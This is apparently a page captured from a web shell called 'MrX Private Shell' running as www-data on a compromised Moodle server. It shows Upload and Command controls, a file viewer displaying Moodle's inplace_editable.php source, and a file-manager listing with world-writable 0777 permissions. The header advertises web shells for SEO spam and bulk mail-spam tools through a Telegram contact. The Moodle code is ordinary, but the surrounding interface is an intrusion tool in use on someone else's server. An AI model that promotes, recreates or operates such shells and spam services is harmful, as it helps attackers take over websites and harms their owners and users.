__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace core\output;

use lang_string;

/**
 * Class allowing to quick edit a title inline
 *
 * This class is used for displaying an element that can be in-place edited by the user. To display call:
 * echo $OUTPUT->render($element);
 * or
 * echo $OUTPUT->render_from_template('core/inplace_editable', $element->export_for_template($OUTPUT));
 *
 * Template core/inplace_editable will automatically load javascript module with the same name
 * core/inplace_editable. Javascript module registers a click-listener on edit link and
 * then replaces the displayed value with an input field. On "Enter" it sends a request
 * to web service core_update_inplace_editable, which invokes the callback from the component.
 * Any exception thrown by the web service (or callback) is displayed as an error popup.
 *
 * Callback {$component}_inplace_editable($itemtype, $itemid, $newvalue) must be present in the lib.php file of
 * the component or plugin. It must return instance of this class.
 *
 * @package    core
 * @category   output
 * @copyright  2016 Marina Glancy
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class inplace_editable implements renderable, templatable {
    /**
     * @var string component responsible for diplsying/updating
     */
    protected $component = null;

    /**
     * @var string itemtype inside the component
     */
    protected $itemtype = null;

    /**
     * @var int identifier of the editable element (usually database id)
     */
    protected $itemid = null;

    /**
     * @var string value of the editable element as it is present in the database
     */
    protected $value = null;

    /**
     * @var string value of the editable element as it should be displayed,
     * must be formatted and may contain links or other html tags
     */
    protected $displayvalue = null;

    /**
     * @var string label for the input element (for screenreaders)
     */
    protected $editlabel = null;

    /**
     * @var string hint for the input element (for screenreaders)
     */
    protected $edithint = null;

    /**
     * @var pix_icon icon to use to toggle editing
     */
    protected $editicon = null;

    /**
     * @var bool indicates if the current user is allowed to edit this element - set in constructor after permissions are checked
     */
    protected $editable = false;

    /**
     * @var string type of the element - text, toggle or select
     */
    protected $type = 'text';

    /**
     * @var string options for the element, for example new value for the toggle or json-encoded list of options for select
     */
    protected $options = '';

    /**
     * Constructor.
     *
     * @param string $component name of the component or plugin responsible for the updating of the value (must declare callback)
     * @param string $itemtype type of the item inside the component
     *                         Each component/plugin may implement multiple inplace-editable elements.
     * @param int $itemid identifier of the item that can be edited in-place
     * @param bool $editable whether this value is editable (check capabilities and editing mode), if false, only "displayvalue"
     *              will be displayed without anything else
     * @param string $displayvalue what needs to be displayed to the user, it must be cleaned, with applied filters (call
     *              {@link format_string()}). It may be wrapped in an html link, contain icons or other decorations
     * @param string $value what needs to be edited - usually raw value from the database, it may contain multilang tags
     * @param lang_string|string $edithint hint (title) that will be displayed under the edit link
     * @param lang_string|string $editlabel label for the input element in the editing mode (for screenreaders)
     * @param pix_icon|null $editicon icon to use to toggle editing
     */
    public function __construct(
        $component,
        $itemtype,
        $itemid,
        $editable,
        $displayvalue,
        $value = null,
        $edithint = null,
        $editlabel = null,
        ?pix_icon $editicon = null
    ) {
        $this->component = $component;
        $this->itemtype = $itemtype;
        $this->itemid = $itemid;
        $this->editable = $editable;
        $this->displayvalue = $displayvalue;
        $this->value = $value;
        $this->edithint = $edithint;
        $this->editlabel = $editlabel;
        $this->editicon = $editicon;
    }

    /**
     * Sets the element type to be a toggle
     *
     * For toggle element $editlabel is not used.
     * $displayvalue must be specified, it can have text or icons but can not contain html links.
     *
     * Toggle element can have two or more options.
     *
     * @param array $options toggle options as simple, non-associative array; defaults to array(0,1)
     * @return self
     */
    public function set_type_toggle($options = null) {
        if ($options === null) {
            $options = [0, 1];
        }
        $options = array_values($options);
        $idx = array_search($this->value, $options, true);
        if ($idx === false) {
            throw new \coding_exception('Specified value must be one of the toggle options');
        }
        $nextvalue = ($idx < count($options) - 1) ? $idx + 1 : 0;

        $this->type = 'toggle';
        $this->options = (string)$nextvalue;
        return $this;
    }

    /**
     * Sets the element type to be a dropdown
     *
     * For select element specifying $displayvalue is optional, if null it will
     * be assumed that $displayvalue = $options[$value].
     * However displayvalue can still be specified if it needs icons and/or
     * html links.
     *
     * If only one option specified, the element will not be editable.
     *
     * @param array $options associative array with dropdown options
     * @return self
     */
    public function set_type_select($options) {
        if (!array_key_exists($this->value, $options)) {
            throw new \coding_exception('Options for select element must contain an option for the specified value');
        }
        if (count($options) < 2) {
            $this->editable = false;
        }
        $this->type = 'select';

        $pairedoptions = [];
        foreach ($options as $key => $value) {
            $pairedoptions[] = [
                'key' => $key,
                'value' => $value,
            ];
        }
        $this->options = json_encode($pairedoptions);
        if ($this->displayvalue === null) {
            $this->displayvalue = $options[$this->value];
        }
        if ($this->editicon === null) {
            $this->editicon = new pix_icon('t/expanded', (string) $this->edithint);
        }
        return $this;
    }

    /**
     * Sets the element type to be an autocomplete field
     *
     * @param array $options associative array with dropdown options
     * @param array $attributes associative array with attributes for autoselect field. See AMD module core/form-autocomplete.
     * @return self
     */
    public function set_type_autocomplete($options, $attributes) {
        $this->type = 'autocomplete';

        $pairedoptions = [];
        foreach ($options as $key => $value) {
            $pairedoptions[] = [
                'key' => $key,
                'value' => $value,
            ];
        }
        $this->options = json_encode(['options' => $pairedoptions, 'attributes' => $attributes]);
        return $this;
    }

    /**
     * Whether the link should contain all of the content or not.
     */
    protected function get_linkeverything() {
        if ($this->type === 'toggle') {
            return true;
        }

        if (preg_match('#<a .*>.*</a>#', $this->displayvalue) === 1) {
            return false;
        }

        return true;
    }

    /**
     * Export this data so it can be used as the context for a mustache template (core/inplace_editable).
     *
     * @param \renderer_base $output typically, the renderer that's calling this function
     * @return array data context for a mustache template
     */
    public function export_for_template(\renderer_base $output) {
        if (!$this->editable) {
            return [
                'displayvalue' => (string)$this->displayvalue,
            ];
        }

        if ($this->editicon === null) {
            $this->editicon = new pix_icon('t/editstring', (string) $this->edithint);
        }

        return [
            'component' => $this->component,
            'itemtype' => $this->itemtype,
            'itemid' => $this->itemid,
            'displayvalue' => (string)$this->displayvalue,
            'value' => (string)$this->value,
            'edithint' => (string)$this->edithint,
            'editlabel' => (string)$this->editlabel,
            'editicon' => $this->editicon->export_for_pix(),
            'type' => $this->type,
            'options' => $this->options,
            'linkeverything' => $this->get_linkeverything() ? 1 : 0,
        ];
    }

    /**
     * Renders this element
     *
     * @param \renderer_base $output typically, the renderer that's calling this function
     * @return string
     */
    public function render(\renderer_base $output) {
        return $output->render_from_template('core/inplace_editable', $this->export_for_template($output));
    }
}

Filemanager

Name Type Size Permission Actions
action_menu Folder 0777
actions Folder 0777
dynamic_tabs Folder 0777
local Folder 0777
progress_trace Folder 0777
renderer_factory Folder 0777
requirements Folder 0777
action_link.php File 4.86 KB 0777
action_menu.php File 23.57 KB 0777
activity_header.php File 8.63 KB 0777
bootstrap_renderer.php File 12.05 KB 0777
checkbox_toggleall.php File 4.93 KB 0777
choicelist.php File 9.42 KB 0777
chooser.php File 3.78 KB 0777
chooser_item.php File 3.12 KB 0777
chooser_section.php File 2.25 KB 0777
comboboxsearch.php File 6.74 KB 0777
context_header.php File 6.01 KB 0777
core_renderer.php File 194.2 KB 0777
core_renderer_ajax.php File 5.7 KB 0777
core_renderer_cli.php File 9.34 KB 0777
core_renderer_maintenance.php File 7.86 KB 0777
custom_menu.php File 7.03 KB 0777
custom_menu_item.php File 7.88 KB 0777
datafilter.php File 3.45 KB 0777
dynamic_tabs.php File 2.26 KB 0777
external.php File 8.11 KB 0777
file_picker.php File 3.65 KB 0777
help_icon.php File 4.37 KB 0777
html_writer.php File 34.28 KB 0777
icon_system.php File 5.25 KB 0777
icon_system_font.php File 1.53 KB 0777
icon_system_fontawesome.php File 26.92 KB 0777
icon_system_standard.php File 1.28 KB 0777
image_icon.php File 1.27 KB 0777
initials_bar.php File 4.94 KB 0777
inplace_editable.php File 9.84 KB 0777
js_writer.php File 5.42 KB 0777
language_menu.php File 5.67 KB 0777
mustache_clean_string_helper.php File 2.17 KB 0777
mustache_engine.php File 2.62 KB 0777
mustache_filesystem_loader.php File 2.35 KB 0777
mustache_helper_collection.php File 6.96 KB 0777
mustache_javascript_helper.php File 1.9 KB 0777
mustache_pix_helper.php File 2.45 KB 0777
mustache_quote_helper.php File 1.87 KB 0777
mustache_shorten_text_helper.php File 1.76 KB 0777
mustache_string_helper.php File 2.31 KB 0777
mustache_template_finder.php File 4.12 KB 0777
mustache_template_source_loader.php File 14.9 KB 0777
mustache_uniqid_helper.php File 1.56 KB 0777
mustache_user_date_helper.php File 1.83 KB 0777
named_templatable.php File 1.23 KB 0777
notification.php File 6.41 KB 0777
paging_bar.php File 8.97 KB 0777
participants_action_bar.php File 8.83 KB 0777
pix_emoticon.php File 1.71 KB 0777
pix_icon.php File 4.89 KB 0777
pix_icon_font.php File 2.9 KB 0777
pix_icon_fontawesome.php File 1.21 KB 0777
plugin_renderer_base.php File 5.86 KB 0777
preferences_group.php File 1.62 KB 0777
preferences_groups.php File 1.47 KB 0777
progress_bar.php File 8.54 KB 0777
progress_trace.php File 1.68 KB 0777
renderable.php File 1.24 KB 0777
renderer_base.php File 16.75 KB 0777
routed_error_handler.php File 1.69 KB 0777
select_menu.php File 6.68 KB 0777
single_button.php File 7.88 KB 0777
single_select.php File 9.43 KB 0777
sticky_footer.php File 4.5 KB 0777
stored_progress_bar.php File 10.39 KB 0777
tabobject.php File 5.11 KB 0777
tabtree.php File 3.37 KB 0777
templatable.php File 1.75 KB 0777
theme_config.php File 84.2 KB 0777
theme_usage.php File 4.32 KB 0777
url_rewriter.php File 1.6 KB 0777
url_select.php File 9.63 KB 0777
user_picture.php File 13.98 KB 0777
xhtml_container_stack.php File 5.79 KB 0777
Filemanager